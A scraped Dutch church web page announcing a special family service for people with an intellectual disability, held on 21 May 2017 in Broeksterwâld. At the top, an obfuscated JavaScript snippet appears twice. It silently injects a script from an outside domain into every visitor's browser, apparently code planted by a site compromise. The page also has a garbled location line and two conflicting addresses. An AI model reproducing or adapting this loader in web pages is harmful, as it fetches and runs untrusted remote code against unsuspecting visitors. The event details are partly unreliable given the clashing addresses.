;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bijzondere gezinsdienst - PKN Damwâld
21 mei 2017
10:30 t/m 11:45
Dijkstrawei 7 Broeksterwâld
Bijzondere gezinsdienst

Op 21 mei wordt in de Gereformeerde kerk in Broeksterwâld, Ds. Feitsmawei 1, een bijzondere gezinsdienst gehouden. De dienst begint om 10.30 uur. Voorganger is ds. A. van Vliet. Het Kidskoor Spetters uit Leeuwarden o.l.v. mw. Van Vliet werkt mee aan de dienst. Iedereen is van harte welkom!

Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op de mensen met een verstandelijke beperking.  Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.

Locatie: Dijkstrawei 7 BroeksterwâldDs. Dijkstrawei 7 Broeksterwâld